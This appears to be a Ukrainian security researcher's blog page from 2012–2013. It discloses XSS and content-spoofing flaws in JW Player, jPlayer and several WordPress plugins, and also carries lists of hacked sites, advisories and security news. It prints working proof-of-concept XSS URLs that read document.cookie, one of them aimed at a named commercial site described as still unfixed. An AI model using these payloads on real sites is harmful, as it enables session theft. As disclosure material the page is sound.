Websecurity - Веб безпека

Продовжуючи розпочату традицію, після попереднього відео про захоплення мережі через руткіти для роутерів, пропоную нове відео на веб секюріті тематику. Цього разу відео про атаки через JavaScript ботнети. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Owning Bad Guys {And Mafia} With Javascript Botnets

Торік на конференції DEFCON 20 відбувся виступ Chema Alonso. В своєму виступі він розповів про MITM атаки та про проведення атак на поганих хлопців через JavaScript ботнети. Коли з використанням JavaScript коду і XSS уразливостей створюються JS ботнети, які використовуються для атак.

Чема розповів про різні аспекти MITM атак та про використання для них JavaScript ботнетів. Рекомендую подивитися дане відео для розуміння сучасних загроз в Інтернеті.

27.12.2012

У листопаді, 22.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на комерційному проекті http://www.comdi.com. Про що вже сповістив адміністрацію сайта.

Стосовно дірок на e-commerce сайтах та сайтах електронних платіжних систем в останнє я писав про уразливості на www.payu.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2013

Content Spoofing:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site

XSS:

http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie)
http://www.comdi.com/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Та інші Content Spoofing та Cross-Site Scripting уразливості в JW Player.

Дані уразливості досі не виправлені.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://koryukivka-rada.gov.ua (хакером Hmei7) - 09.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://rekord.gov.ua (хакером Hmei7) - 10.02.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://belwitec.com.ua (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://cargo-euro.com (хакером Sejeal) - 23.01.2013, зараз сайт вже виправлений адмінами
• http://dju.org.ua (хакером rEd X) - 17.04.2013, зараз сайт вже виправлений адмінами

В даній добірці уразливості в веб додатках:

• (0Day) HP SiteScope SOAP Call getFileInternal Remote Code Execution Vulnerability (деталі)
• EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities (деталі)
• (0Day) HP SiteScope SOAP Call loadFileContent Remote Code Execution Vulnerability (деталі)
• tinyproxy security update (деталі)
• (0Day) HP SiteScope SOAP Call update Remote Code Execution Vulnerability (деталі)
• FreeRADIUS: Stack Overflow in TLS-based EAP Methods (деталі)
• freeradius security update (деталі)
• Memory corruption vulnerabilities in Konqueror (деталі)
• HP Performance Insight with Sybase, Remote Denial of Service (DoS) and Loss of Data (деталі)
• Mesa vulnerability, as used in Google Chrome (деталі)

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в плагінах для WordPress, що містять jPlayer. Про що вже сповістив розробників п’яти наведених плагінів.

Раніше я писав про XSS та Content Spoofing уразливості в jPlayer. Це дуже поширена флешка, що знаходиться на десятках тисяч веб сайтів і яка використовується в сотнях веб додатків. При стандартному пошуку через Гугл дорки виводиться 32000 сайтів з Jplayer.swf, а при пошуку по плагінам для WordPress можна знайти 239000 сайтів з цією флешкою.

Цей плеєр міститься в багатьох плагінах для WordPress. Серед них MP3-jPlayer, Haiku minimalist audio player, Background Music, Jammer і WP jPlayer. Та існують інші уразливі плагіни для WordPress з Jplayer.swf (судячи з гугл дорка). Розробники jPlayer випустили оновлення свого плеєра і всім розробникам веб додатків з jPlayer потрібно його оновити в своїх додатках.

Cross-Site Scripting (WASC-08):

В різних версіях jPlayer різні XSS уразливості.

MP3-jPlayer:

http:/site/wp-content/plugins/mp3-jplayer/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Haiku minimalist audio player:

http:/site/wp-content/plugins/haiku-minimalist-audio-player/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Background Music:

http:/site/wp-content/plugins/background-music/js/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

Jammer:

http:/site/wp-content/plugins/jammer/files/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

WP jPlayer:

http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/wp-content/plugins/wp-jplayer/assets/js/Jplayer.swf?id='))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Вразливі наступні веб додатки: MP3-jPlayer 1.8.3 і попередні версії, Haiku minimalist audio player 1.0.0 і попередні версії, Background Music 1.0 і попередні версії, Jammer 0.2 і попередні версії, WP jPlayer 0.1 і попередні версії.

Дані XSS уразливості виправлені в версії jPlayer 2.2.23 (але не виправлені CS через JS і XSS атаки через JS калбеки, а також в версії 2.3.0 працюють інші обхідні методи атаки, про що я вже писав розробникам jPlayer у березні та нагадав ще раз). Тому розробникам даних та інших плагінів для WP з jPlayer потрібно оновити його до останньої версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://pk-alligator.com.ua - інфекція була виявлена 05.04.2013. Зараз сайт входить до переліку підозрілих.
• http://top.zp.ua - інфекція була виявлена 21.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://volfy.at.ua - інфекція була виявлена 18.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://best.ua - інфекція була виявлена 23.04.2013. Зараз сайт не входить до переліку підозрілих.
• http://gorlovkadosk.net.ua - інфекція була виявлена 12.04.2013. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в Adobe Flash Player.

Уразливі продукти: Adobe Flash Player 11.6, AIR 3.6.

Численні пошкодження пам’яті.

• Adobe Flash Player RTMP Data Processing Object Confusion (CVE-2013-2555) (деталі)
• Security updates available for Adobe Flash Player (деталі)
• Security updates available for Adobe Flash Player (деталі)

В даній добірці експлоіти в веб додатках:

• StarVedia IPCamera Remote Username / Password Disclosure (деталі)
• SAP ConfigServlet OS Command Execution (деталі)
• Netgear DGN2200B pppoe.cgi Remote Command Execution Vulnerability (деталі)
• Java Applet Reflection Type Confusion Remote Code Execution (деталі)
• MinaliC Webserver 2.0.0 Buffer Overflow Vulnerability (деталі)

14.03.2013

У січні, 31.01.2013, я виявив Cross-Site Scripting та Content Spoofing уразливості в jPlayer. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

20.04.2013

Cross-Site Scripting (WASC-08):

В різних версія jPlayer різні XSS уразливості.

0.2.1 - 1.2.0:

http:/site/Jplayer.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.0.0:

http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

2.1.0:

http:/site/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)//
http:/site/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//

В версії 2.2.0 ці XSS уразливості вже виправлені. Але Malte Batram (в версії 2.2.19) і я (в версії 2.2.20) виявили нові.

2.2.0 - 2.2.19 (і попередні версії):

Атака працює в Firefox (всі версії та браузери на движку Gecko), IE6 і Opera 10.62.

http:/site/Jplayer.swf?jQuery=document.write&id=%3Cimg%20src=1%20onerror=alert\u0028document.cookie\u0029%3E

2.2.20 - 2.2.22 (і попередні версії):

http:/site/Jplayer.swf?jQuery=alert&id=XSS

Content Spoofing (WASC-12):

Можна проводити CS (включення аудіо/відео файлів з зовнішніх ресурсів) через JS і XSS через JS калбеки. Для цього необхідна HTML Injection уразливість на цільовому сайті. Атака аналогічна XSS через калбеки в JW Player.

Уразливі версії до jPlayer 2.2.23. Версія 2.2.23 і остання версія 2.3.0 не є вразливими до наведених XSS, окрім CS через JS і XSS атак через JS калбеки. Також в версії 2.3.0 працюють інші обхідні методи атаки, які вони не виправили окрім атаки через alert. Про що я вже писав розробникам у березні та нагадав ще раз.

За повідомленням www.3dnews.ru, Google визнаний найбільш безпечним пошуковцем.

Цього року Microsoft запустила рекламну кампанію “Scroogled”, у якій описані всі “недоліки” використання пристроїв з Android та пошуковця Google. Як альтернативний варіант Microsoft пропонує користувачам перейти на свій власний пошуковець Bing. Німецькі експерти по безпеці з AV-Test не вважають це оптимальним варіантом.

Фахівці з AV-Test протестували більше 10 мільйонів сайтів в пошукових системах Yandex, Bing, Google і Blekko. Пошуковець Гугла показав найкраще співвідношення інфікованих сайтів до загальної кількості перевірених сайтів.

За повідомленням www.xakep.ru, сисадмін хостинг-провайдера Hostgator поставив бекдори на 2700 серверів.

Колишній співробітник хостинг-провайдера Hostgator викритий у шпигунстві. Він поставив бекдори на 2700 серверів у даті-центрі Hostgator - і одержав необмежений доступ до інформації клієнтів компанії.

В цілому бекдор був установлений на 2723 сервера в мережі компанії Hostgator, на кожному із серверів можуть розміщатися сотні сайтів. Розміщення працівниками хостера бекдорів на серверах - це ще один зі шляхів розповсюдження бекдорів, окрім взломів сайтів та включення бекдорів у репозиторії веб додатків.

За повідомленням www.opennet.ru, дослідження показало жалюгідний стан захищеності SOHO-маршрутизаторів.

Компанія Independent Security Evaluators опублікувала результати дослідження безпеки найбільш популярних моделей бездротових маршрутизаторів для домашніх користувачів і невеликих офісів. У результаті, у всіх розглянутих 13 моделях пристроїв виявлені уразливості, що дозволяють нападнику одержати повний контроль над конфігурацією маршрутизатора чи обійти засоби аутентифікації.

Серед розглянутих у дослідженні пристроїв відзначаються різні моделі бездротових маршрутизаторів Asus, D-Link, TP-Link, Netgear, Linksys, Belkin, Verizon Actiontec і 5 неназваних пристроїв для яких ще не випущені оновлення прошивки з усуненням уразливостей.